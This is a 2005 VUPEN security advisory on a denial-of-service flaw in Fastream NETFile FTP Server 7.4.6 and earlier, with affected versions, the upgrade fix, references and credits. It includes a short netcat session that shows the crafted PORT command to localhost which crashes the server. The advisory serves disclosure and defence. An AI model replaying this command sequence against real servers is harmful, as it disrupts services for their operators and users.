|
|
>> Fastream NETFile PORT Command Denial of Service Vulnerability
|
Title : Fastream NETFile PORT Command Denial of Service Vulnerability
VUPEN ID : VUPEN/ADV-2005-0556
CVE ID : GENERIC-MAP-NOMATCH
CWE ID : CWE-
Rated as : Low Risk 
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2005-05-17
|
A vulnerability was identified in Fastream NETFile, which may be exploited by attackers to cause a denial of service. This flaw occurs when handling a specially crafted FTP PORT command containing the localhost's IP address (127.0.0.1), which could be exploited to cause the server to crash.
c:\> nc IP port
220 Fastream NETFile FTP Server
USER anonymous
331 Password required for anonymous.
PASS xxxxx
230 User anonymous has successfully logged in.
PORT 127,0,0,1,0,21
200 Port command successful.
RETR file.txt
150 Opening data connection for a.txt.
226 File sent ok
Affected Products
Fastream NETFile FTP/Web Server version 7.4.6 and prior
Solution
Upgrade to Fastream NETFile version 7.6 :
http://www.fastream.com/netfileserver.htm
References
http://www.vupen.com/english/advisories/2005/0556
http://www.security.org.sg/vuln/netfileftp746port.html
Credits
Vulnerabilities reported by Tan Chew Keong
ChangeLog
2005-05-17 : Initial release
Vulnerability Management
Subscribe to VUPEN VNS and receive real-time e-mail and SMS alerts when new advisories or patches relevant to your systems and network configurations are available.
Feedback
If you have additional information or corrections for this security advisory please submit them via our contact form. | |
|
